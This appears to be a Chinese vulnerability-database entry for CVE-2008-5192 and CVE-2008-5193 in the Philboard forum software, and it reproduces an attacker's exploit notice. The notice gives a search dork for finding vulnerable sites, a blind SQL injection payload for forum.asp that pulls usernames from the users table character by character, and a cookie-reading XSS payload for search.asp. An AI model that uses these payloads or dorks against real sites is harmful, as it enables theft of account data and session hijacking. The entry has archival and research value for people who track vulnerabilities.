W1L3D4 Philboard 1.2 (Blind SQL/XSS) Multiple Remote Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052372 漏洞类型
发布时间 2008-11-23 更新时间 2008-11-23
CVE编号 CVE-2008-5192
CVE-2008-5193
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008110131
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
> [+] Script Name     : philboard v 1.14 Multiple Remote Exploits

> |+| Team            : InjEct0r5

> [+] Author          : Bl@ckbe@rD ('Tunisian TerrorisT') ;

> [+] Contact         : blackbeard-sql[A.T]hotmail{.}fr ;

> [+] Dork            : Powered by v1.14 powered by philboard v1.14

> --//-->

> [+] Expl0iT :

> Remote SQL Injection :

> __--> http://www.dork.cc/[ScriptPath]/forum.asp?forumid=[SQL]

> Blind Way  : IIF((select%20mid(last(username),1,1)%20from%20(select%20top%2010%20username%20from%20users))='a',0,'Bingo')%00

> Remote XSS Exploit :

> __--> http://www.dork.co.il/[Script Path]/search.asp?searchterms=[XSS]

[XSS] --> <script>alert(document.cookie)</script>